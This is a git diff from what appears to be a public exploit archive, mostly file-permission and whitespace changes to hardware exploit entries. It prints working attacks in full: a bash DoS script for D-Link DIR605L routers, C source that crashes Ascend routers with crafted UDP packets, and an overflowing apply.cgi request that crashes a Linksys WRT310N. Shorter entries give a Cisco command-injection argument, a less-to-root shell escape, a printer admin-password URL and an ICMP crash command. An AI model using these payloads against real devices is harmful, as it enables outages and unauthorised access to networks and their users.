a/platforms/hardware/dos/38475.txt b/platforms/hardware/dos/38475.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/38483.txt b/platforms/hardware/dos/38483.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/38493.txt b/platforms/hardware/dos/38493.txt old mode 100755 new mode 100644 index 6c52d91a1..3ff8e574f --- a/platforms/hardware/dos/38493.txt +++ b/platforms/hardware/dos/38493.txt @@ -4,4 +4,4 @@ The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerab Successful exploits will cause the device to crash, denying service to legitimate users. -http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1 \ No newline at end of file +http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1 \ No newline at end of file diff --git a/platforms/hardware/dos/39225.txt b/platforms/hardware/dos/39225.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/39706.txt b/platforms/hardware/dos/39706.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/40014.txt b/platforms/hardware/dos/40014.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/40289.txt b/platforms/hardware/dos/40289.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/40687.txt b/platforms/hardware/dos/40687.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/40814.txt b/platforms/hardware/dos/40814.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/40910.txt b/platforms/hardware/dos/40910.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41219.txt b/platforms/hardware/dos/41219.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41369.txt b/platforms/hardware/dos/41369.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41601.c b/platforms/hardware/dos/41601.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41643.txt b/platforms/hardware/dos/41643.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41806.txt b/platforms/hardware/dos/41806.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/41826.txt b/platforms/hardware/dos/41826.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/42518.txt b/platforms/hardware/dos/42518.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/43119.py b/platforms/hardware/dos/43119.py index 0ac22ce37..8716b6d7c 100755 --- a/platforms/hardware/dos/43119.py +++ b/platforms/hardware/dos/43119.py @@ -51,4 +51,4 @@ while True: s.close() except: print("[!] Can't connect to target") - sys.exit() + sys.exit() \ No newline at end of file diff --git a/platforms/hardware/dos/43147.sh b/platforms/hardware/dos/43147.sh new file mode 100755 index 000000000..1356a4bdd --- /dev/null +++ b/platforms/hardware/dos/43147.sh @@ -0,0 +1,25 @@ +# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675) +# Date: 2017-11-14 +# Exploit Author: Enrique Castillo +# Contact: https://twitter.com/_hyperlogic +# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/ +# Vendor Homepage: http://us.dlink.com/ +# Software Link: specific version no longer available on vendor site +# Version: 2.08UI and prior +# CVE : CVE-2017-9675 +# Tested on Linux +### +# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for +# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered +# from both LAN and WAN. +### +#!/usr/bin/env bash +# usage: ./sploit.sh <router_ip> +ROUTER=$1 + +if [ "$#" -ne 1 ]; then + echo "usage: $0 <router_ip>" + exit +fi + +curl http://$ROUTER/Tools/ \ No newline at end of file diff --git a/platforms/hardware/dos/4978.html b/platforms/hardware/dos/4978.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/5054.c b/platforms/hardware/dos/5054.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/59.c b/platforms/hardware/dos/59.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/60.c b/platforms/hardware/dos/60.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/6459.txt b/platforms/hardware/dos/6459.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/6726.txt b/platforms/hardware/dos/6726.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/688.c b/platforms/hardware/dos/688.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/7060.txt b/platforms/hardware/dos/7060.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/7220.txt b/platforms/hardware/dos/7220.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/7535.php b/platforms/hardware/dos/7535.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/7632.txt b/platforms/hardware/dos/7632.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/7776.c b/platforms/hardware/dos/7776.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8008.txt b/platforms/hardware/dos/8008.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8013.txt b/platforms/hardware/dos/8013.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8051.html b/platforms/hardware/dos/8051.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8106.txt b/platforms/hardware/dos/8106.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8260.txt b/platforms/hardware/dos/8260.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8313.txt b/platforms/hardware/dos/8313.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8393.txt b/platforms/hardware/dos/8393.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/856.c b/platforms/hardware/dos/856.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/8964.txt b/platforms/hardware/dos/8964.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/9646.php b/platforms/hardware/dos/9646.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/9666.php b/platforms/hardware/dos/9666.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/9956.txt b/platforms/hardware/dos/9956.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/9980.txt b/platforms/hardware/dos/9980.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/20999.c b/platforms/hardware/local/20999.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/21001.txt b/platforms/hardware/local/21001.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/24899.txt b/platforms/hardware/local/24899.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/25718.txt b/platforms/hardware/local/25718.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/27285.txt b/platforms/hardware/local/27285.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/32370.txt b/platforms/hardware/local/32370.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/34954.txt b/platforms/hardware/local/34954.txt old mode 100755 new mode 100644 index 3522ab693..f42c301a2 --- a/platforms/hardware/local/34954.txt +++ b/platforms/hardware/local/34954.txt @@ -8,4 +8,4 @@ This issue is tracked by Cisco Bug ID CSCti52041 and CSCti74930. Cisco Unified Communications Manager 6, 7, and 8 are vulnerable. -/usr/local/cm/bin/pktCap_protectData -i";id" \ No newline at end of file +/usr/local/cm/bin/pktCap_protectData -i";id" \ No newline at end of file diff --git a/platforms/hardware/local/36813.txt b/platforms/hardware/local/36813.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/40271.txt b/platforms/hardware/local/40271.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/41745.txt b/platforms/hardware/local/41745.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/41754.txt b/platforms/hardware/local/41754.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/8833.txt b/platforms/hardware/local/8833.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/9688.txt b/platforms/hardware/local/9688.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/local/9955.txt b/platforms/hardware/local/9955.txt old mode 100755 new mode 100644 index 1cd2da313..da5547be5 --- a/platforms/hardware/local/9955.txt +++ b/platforms/hardware/local/9955.txt @@ -1,3 +1,3 @@ Device: Snap Server 410 OS: GuardianOS 5.1.041 -Description: When logged in to CLI via ssh as admin (uid=1) you can escalate your privileges to uid 0 and get /bin/sh. In order to achieve this open 'less' which is available as default for viewing files (ie. less /tmp/top.log) and type in '!/bin/sh'. This will give you direct access to sh shell with UID 0. Tested only on OS version as above. \ No newline at end of file +Description: When logged in to CLI via ssh as admin (uid=1) you can escalate your privileges to uid 0 and get /bin/sh. In order to achieve this open 'less' which is available as default for viewing files (ie. less /tmp/top.log) and type in '!/bin/sh'. This will give you direct access to sh shell with UID 0. Tested only on OS version as above. \ No newline at end of file diff --git a/platforms/hardware/remote/10000.txt b/platforms/hardware/remote/10000.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/10011.txt b/platforms/hardware/remote/10011.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/10055.txt b/platforms/hardware/remote/10055.txt old mode 100755 new mode 100644 index 93d13354f..671bf745b --- a/platforms/hardware/remote/10055.txt +++ b/platforms/hardware/remote/10055.txt @@ -97,4 +97,4 @@ is strictly prohibited. If you have received this message in error, please notif either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ------------------------------------ \ No newline at end of file +----------------------------------- \ No newline at end of file diff --git a/platforms/hardware/remote/10081.txt b/platforms/hardware/remote/10081.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/10362.txt b/platforms/hardware/remote/10362.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/10451.txt b/platforms/hardware/remote/10451.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/10510.txt b/platforms/hardware/remote/10510.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/1081.c b/platforms/hardware/remote/1081.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/11822.txt b/platforms/hardware/remote/11822.txt old mode 100755 new mode 100644 index ad1779e14..64f054da6 --- a/platforms/hardware/remote/11822.txt +++ b/platforms/hardware/remote/11822.txt @@ -63,4 +63,4 @@ Current vulnerability is checked and verified with zk5000 hardware model, possib # Greetz to all Darkc0de, Andhra Hackers and ICW Memebers[Indian Cyber Wrriors] #Thanks : Mr bond,beenu,Wipu,GOdwinAustin,The_empty,hg_H@x0r,r45c4l,it_security,eberly,harin,manoj #Shoutz : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin -#Catch us at www.andhrahackers.com or www.teamicw.in \ No newline at end of file +#Catch us at www.andhrahackers.com or www.teamicw.in \ No newline at end of file diff --git a/platforms/hardware/remote/12265.txt b/platforms/hardware/remote/12265.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/12298.txt b/platforms/hardware/remote/12298.txt old mode 100755 new mode 100644 index 4ae19f0e0..6bfb68e3b --- a/platforms/hardware/remote/12298.txt +++ b/platforms/hardware/remote/12298.txt @@ -40,4 +40,4 @@ For a remote modem: hkm@hakim.ws - [ Comunidad Underground de Mexico - http://www.underground.org.mx ] \ No newline at end of file + [ Comunidad Underground de Mexico - http://www.underground.org.mx ] \ No newline at end of file diff --git a/platforms/hardware/remote/12865.txt b/platforms/hardware/remote/12865.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/1333.pm b/platforms/hardware/remote/1333.pm old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/14536.txt b/platforms/hardware/remote/14536.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/15505.txt b/platforms/hardware/remote/15505.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/15631.txt b/platforms/hardware/remote/15631.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/15842.txt b/platforms/hardware/remote/15842.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16100.txt b/platforms/hardware/remote/16100.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16123.txt b/platforms/hardware/remote/16123.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16149.txt b/platforms/hardware/remote/16149.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16226.txt b/platforms/hardware/remote/16226.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16227.txt b/platforms/hardware/remote/16227.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16238.txt b/platforms/hardware/remote/16238.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16239.txt b/platforms/hardware/remote/16239.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16240.txt b/platforms/hardware/remote/16240.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/16275.txt b/platforms/hardware/remote/16275.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17244.txt b/platforms/hardware/remote/17244.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17279.txt b/platforms/hardware/remote/17279.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17290.txt b/platforms/hardware/remote/17290.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17356.txt b/platforms/hardware/remote/17356.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17422.txt b/platforms/hardware/remote/17422.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/17883.txt b/platforms/hardware/remote/17883.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/18291.txt b/platforms/hardware/remote/18291.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/18673.txt b/platforms/hardware/remote/18673.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/18675.txt b/platforms/hardware/remote/18675.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/18779.txt b/platforms/hardware/remote/18779.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/1889.txt b/platforms/hardware/remote/1889.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/19402.txt b/platforms/hardware/remote/19402.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/19444.txt b/platforms/hardware/remote/19444.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/19538.txt b/platforms/hardware/remote/19538.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/19554.c b/platforms/hardware/remote/19554.c old mode 100755 new mode 100644 index 171f34fa7..2828d61c2 --- a/platforms/hardware/remote/19554.c +++ b/platforms/hardware/remote/19554.c @@ -1,177 +1,179 @@ +/* source: http://www.securityfocus.com/bid/714/info Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. +*/ - /* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug. - * see ftp.ascend.com. - */ - - /* - * Ascend Kill II - C version - * - * (C) 1998 Rootshell - http://www.rootshell.com/ - * - * Released: 3/16/98 - * - * Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues - * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) - * - * Sends a specially constructed UDP packet on the discard port (9) - * which cause Ascend routers to reboot. (Warning! Ascend routers will - * process these if they are broadcast packets.) - * - * Compiled under RedHat 5.0 with glibc. - * - * NOTE: This program is NOT to be used for malicous purposes. This is - * intenteded for educational purposes only. By using this program - * you agree to use this for lawfull purposes ONLY. - * - * It is worth mentioning that Ascend has known about this bug for quite - * some time. - * - * Fix: - * - * Filter inbound UDP on port 9. - * - */ +/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug. + * see ftp.ascend.com. + */ + +/* + * Ascend Kill II - C version + * + * (C) 1998 Rootshell - http://www.rootshell.com/ + * + * Released: 3/16/98 + * + * Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues + * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) + * + * Sends a specially constructed UDP packet on the discard port (9) + * which cause Ascend routers to reboot. (Warning! Ascend routers will + * process these if they are broadcast packets.) + * + * Compiled under RedHat 5.0 with glibc. + * + * NOTE: This program is NOT to be used for malicous purposes. This is + * intenteded for educational purposes only. By using this program + * you agree to use this for lawfull purposes ONLY. + * + * It is worth mentioning that Ascend has known about this bug for quite + * some time. + * + * Fix: + * + * Filter inbound UDP on port 9. + * + */ - #include <stdio.h> - #include <stdlib.h> - #include <string.h> - #include <unistd.h> - #include <sys/types.h> - #include <sys/socket.h> - #include <netinet/in.h> - #include <netinet/in_systm.h> - #include <netinet/ip.h> - #include <linux/udp.h> - #include <netdb.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> +#include <netinet/in_systm.h> +#include <netinet/ip.h> +#include <linux/udp.h> +#include <netdb.h> - #define err(x) { fprintf(stderr, x); exit(1); } - #define errs(x, y) { fprintf(stderr, x, y); exit(1); } +#define err(x) { fprintf(stderr, x); exit(1); } +#define errs(x, y) { fprintf(stderr, x, y); exit(1); } - /* This magic packet was taken from the Java Configurator */ - char ascend_data[] = - { - 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, - 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, - 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, - 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, - 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, - 0x50, 0x41, 0x53, 0x53}; +/* This magic packet was taken from the Java Configurator */ +char ascend_data[] = + { + 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, + 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, + 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, + 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, + 0x50, 0x41, 0x53, 0x53}; - unsigned short - in_cksum (addr, len) - u_short *addr; - int len; - { - register int nleft = len; - register u_short *w = addr; - register int sum = 0; - u_short answer = 0; +unsigned short +in_cksum (addr, len) + u_short *addr; + int len; +{ + register int nleft = len; + register u_short *w = addr; + register int sum = 0; + u_short answer = 0; - while (nleft > 1) - { - sum += *w++; - nleft -= 2; - } - if (nleft == 1) - { - *(u_char *) (&answer) = *(u_char *) w; - sum += answer; - } + while (nleft > 1) + { + sum += *w++; + nleft -= 2; + } + if (nleft == 1) + { + *(u_char *) (&answer) = *(u_char *) w; + sum += answer; + } - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; - return (answer); - } + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + return (answer); +} - int - sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) - struct sockaddr_in *sin; - unsigned short int s, datalen, sport, dport; - unsigned long int saddr, daddr; - char *data; - { - struct iphdr ip; - struct udphdr udp; - static char packet[8192]; - char crashme[500]; - int i; +int +sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) + struct sockaddr_in *sin; + unsigned short int s, datalen, sport, dport; + unsigned long int saddr, daddr; + char *data; +{ + struct iphdr ip; + struct udphdr udp; + static char packet[8192]; + char crashme[500]; + int i; - ip.ihl = 5; - ip.version = 4; - ip.tos = rand () % 100;; - ip.tot_len = htons (28 + datalen); - ip.id = htons (31337 + (rand () % 100)); - ip.frag_off = 0; - ip.ttl = 255; - ip.protocol = IPPROTO_UDP; - ip.check = 0; - ip.saddr = saddr; - ip.daddr = daddr; - ip.check = in_cksum ((char *) &ip, sizeof (ip)); - udp.source = htons (sport); - udp.dest = htons (dport); - udp.len = htons (8 + datalen); - udp.check = (short) 0; - memcpy (packet, (char *) &ip, sizeof (ip)); - memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); - memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); - /* Append random garbage to the packet, without this the router - will think this is a valid probe packet and reply. */ - for (i = 0; i < 500; i++) - crashme[i] = rand () % 255; - memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); - return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, - (struct sockaddr *) sin, sizeof (struct sockaddr_in))); - } + ip.ihl = 5; + ip.version = 4; + ip.tos = rand () % 100;; + ip.tot_len = htons (28 + datalen); + ip.id = htons (31337 + (rand () % 100)); + ip.frag_off = 0; + ip.ttl = 255; + ip.protocol = IPPROTO_UDP; + ip.check = 0; + ip.saddr = saddr; + ip.daddr = daddr; + ip.check = in_cksum ((char *) &ip, sizeof (ip)); + udp.source = htons (sport); + udp.dest = htons (dport); + udp.len = htons (8 + datalen); + udp.check = (short) 0; + memcpy (packet, (char *) &ip, sizeof (ip)); + memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); + memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); + /* Append random garbage to the packet, without this the router + will think this is a valid probe packet and reply. */ + for (i = 0; i < 500; i++) + crashme[i] = rand () % 255; + memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); + return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, + (struct sockaddr *) sin, sizeof (struct sockaddr_in))); +} - unsigned int - lookup (host) - char *host; - { - unsigned int addr; - struct hostent *he; +unsigned int +lookup (host) + char *host; +{ + unsigned int addr; + struct hostent *he; - addr = inet_addr (host); - if (addr == -1) - { - he = gethostbyname (host); - if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) - return 0; + addr = inet_addr (host); + if (addr == -1) + { + he = gethostbyname (host); + if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) + return 0; - bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); - } - return (addr); - } + bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); + } + return (addr); +} - void - main (argc, argv) - int argc; - char **argv; - { - unsigned int saddr, daddr; - struct sockaddr_in sin; - int s, i; +void +main (argc, argv) + int argc; + char **argv; +{ + unsigned int saddr, daddr; + struct sockaddr_in sin; + int s, i; - if (argc != 3) - errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]); + if (argc != 3) + errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]); - if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) - err ("Unable to open raw socket.\n"); - if (!(saddr = lookup (argv[1]))) - err ("Unable to lookup source address.\n"); - if (!(daddr = lookup (argv[2]))) - err ("Unable to lookup destination address.\n"); - sin.sin_family = AF_INET; - sin.sin_port = 9; - sin.sin_addr.s_addr = daddr; - if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) - { - perror ("sendpkt_udp"); - err ("Error sending the UDP packet.\n"); - } - } \ No newline at end of file + if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) + err ("Unable to open raw socket.\n"); + if (!(saddr = lookup (argv[1]))) + err ("Unable to lookup source address.\n"); + if (!(daddr = lookup (argv[2]))) + err ("Unable to lookup destination address.\n"); + sin.sin_family = AF_INET; + sin.sin_port = 9; + sin.sin_addr.s_addr = daddr; + if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) + { + perror ("sendpkt_udp"); + err ("Error sending the UDP packet.\n"); + } +} \ No newline at end of file diff --git a/platforms/hardware/remote/19632.txt b/platforms/hardware/remote/19632.txt old mode 100755 new mode 100644 index 36fb83288..30c9451c4 --- a/platforms/hardware/remote/19632.txt +++ b/platforms/hardware/remote/19632.txt @@ -7,4 +7,4 @@ In at least one version of this printer there are a series of undocumented URL's To obtain the administrator password: -http://printername/ncl_items.html?SUBJECT=2097 \ No newline at end of file +http://printername/ncl_items.html?SUBJECT=2097 \ No newline at end of file diff --git a/platforms/hardware/remote/19901.txt b/platforms/hardware/remote/19901.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/19943.txt b/platforms/hardware/remote/19943.txt old mode 100755 new mode 100644 index 880788b12..43d7f1053 --- a/platforms/hardware/remote/19943.txt +++ b/platforms/hardware/remote/19943.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1228/info The Intel Express 8100 and possibly 8200 ISDN routers can be remotely crashed by sending fragmented or oversized ICMP packets. Using libnet and isic-0.05: -icmpsic -s 127.0.0.1,23 -d <target.router.ip.address> -F 100 \ No newline at end of file +icmpsic -s 127.0.0.1,23 -d <target.router.ip.address> -F 100 \ No newline at end of file diff --git a/platforms/hardware/remote/20067.c b/platforms/hardware/remote/20067.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/20231.txt b/platforms/hardware/remote/20231.txt old mode 100755 new mode 100644 index 733c7dcf3..887ff684d --- a/platforms/hardware/remote/20231.txt +++ b/platforms/hardware/remote/20231.txt @@ -12,4 +12,4 @@ expn guest ( Now i could enumerate user vrfy oracle and have access to all command) help whatever command i want -quit \ No newline at end of file +quit \ No newline at end of file diff --git a/platforms/hardware/remote/2034.txt b/platforms/hardware/remote/2034.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/20565.c b/platforms/hardware/remote/20565.c old mode 100755 new mode 100644 index 7f8a0697e..40697da36 --- a/platforms/hardware/remote/20565.c +++ b/platforms/hardware/remote/20565.c @@ -1,79 +1,81 @@ +/* source: http://www.securityfocus.com/bid/2245/info Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. +*/ - /* - HP Printer Hack - 12/8/97 sili@l0pht.com - */ +/* + HP Printer Hack + 12/8/97 sili@l0pht.com +*/ - #include <sys/types.h> - #include <sys/socket.h> - #include <netdb.h> - #include <netinet/in.h> - #include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netdb.h> +#include <netinet/in.h> +#include <stdio.h> - #define PORT 9100 +#define PORT 9100 - int main (int argc, char *argv[]) { +int main (int argc, char *argv[]) { - int sockfd,len,bytes_sent; /* Sock FD */ - struct hostent *host; /* info from gethostbyname */ - struct sockaddr_in dest_addr; /* Host Address */ - char line[100]; + int sockfd,len,bytes_sent; /* Sock FD */ + struct hostent *host; /* info from gethostbyname */ + struct sockaddr_in dest_addr; /* Host Address */ + char line[100]; - if (argc !=3) { - printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]); - printf("\tMessage can be up to 16 characters long\n"); - exit(1); - } + if (argc !=3) { + printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]); + printf("\tMessage can be up to 16 characters long\n"); + exit(1); + } - if ( 